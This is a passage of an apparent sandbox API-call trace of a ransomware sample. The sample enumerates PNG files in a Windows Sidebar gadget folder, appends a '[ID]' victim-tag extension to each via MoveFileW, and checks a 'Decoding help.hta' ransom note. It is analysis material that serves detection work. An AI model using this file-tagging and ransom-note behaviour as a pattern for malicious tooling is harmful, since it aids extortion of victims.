Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.519] lstrcmpiW (lpString1="Decoding help.hta", lpString2="0.png") returned 1 [0061.519] lstrlenW (lpString="0.png") returned 5 [0061.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.519] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.519] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="0.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" [0061.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" [0061.519] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.519] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8498f944, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8498f944, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x38888b53, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5323, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.png", cAlternateFileName="")) returned 1 [0061.519] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.519] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.519] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.519] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.519] lstrcmpiW (lpString1="Decoding help.hta", lpString2="1.png") returned 1 [0061.519] lstrlenW (lpString="1.png") returned 5 [0061.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.519] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.519] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="1.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" [0061.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" [0061.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.520] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a4e015, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84a4e015, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x388aecb1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.png", cAlternateFileName="")) returned 1 [0061.520] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.520] lstrcmpiW (lpString1="Decoding help.hta", lpString2="10.png") returned 1 [0061.520] lstrlenW (lpString="10.png") returned 6 [0061.520] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="10.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" [0061.520] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" [0061.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.520] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a74172, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84a74172, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x38947229, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6936, dwReserved0=0x0, dwReserved1=0x0, cFileName="11.png", cAlternateFileName="")) returned 1 [0061.520] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.521] lstrcmpiW (lpString1="Decoding help.hta", lpString2="11.png") returned 1 [0061.521] lstrlenW (lpString="11.png") returned 6 [0061.521] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.521] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="11.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" [0061.521] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" [0061.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.521] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849b5aa1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x849b5aa1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x389b9643, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7210, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.png", cAlternateFileName="")) returned 1 [0061.521] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.521] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.521] lstrcmpiW (lpString1="Decoding help.hta", lpString2="2.png") returned 1 [0061.521] lstrlenW (lpString="2.png") returned 5 [0061.521] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.521] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="2.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" [0061.521] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" [0061.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.522] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849b5aa1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x849b5aa1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x389df7a1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5f4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.png", cAlternateFileName="")) returned 1 [0061.522] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.522] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.522] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.522] lstrcmpiW (lpString1="Decoding help.hta", lpString2="3.png") returned 1 [0061.522] lstrlenW (lpString="3.png") returned 5 [0061.522] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.522] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.522] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="3.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" [0061.522] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" [0061.522] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.522] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849dbbfe, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x849dbbfe, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x38cd92f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3dec, dwReserved0=0x0, dwReserved1=0x0, cFileName="4.png", cAlternateFileName="")) returned 1 [0061.522] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.522] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.522] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.523] lstrcmpiW (lpString1="Decoding help.hta", lpString2="4.png") returned 1 [0061.523] lstrlenW (lpString="4.png") returned 5 [0061.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.523] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.523] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="4.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" [0061.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" [0061.523] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows 